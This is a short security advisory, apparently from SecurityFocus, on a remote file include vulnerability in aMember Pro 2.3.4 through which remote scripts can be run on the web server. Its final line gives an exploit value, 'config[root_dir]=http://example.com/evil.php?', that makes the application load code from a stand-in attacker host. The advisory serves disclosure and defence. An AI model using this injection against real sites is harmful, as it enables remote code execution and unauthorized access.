11 lines
No EOL
622 B
Text
11 lines
No EOL
622 B
Text
source: https://www.securityfocus.com/bid/14777/info
|
|
|
|
aMember is prone to a remote file include vulnerability.
|
|
|
|
Input passed to various scripts is not sufficiently sanitized. An attacker could host arbitrary malicious code in a file at an attacker-controlled site and include the file using a URI parameter.
|
|
|
|
This issue may be leveraged to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
|
|
|
|
aMember Pro 2.3.4 is reportedly affected, other versions may also be vulnerable.
|
|
|
|
config[root_dir]=http://example.com/evil.php? |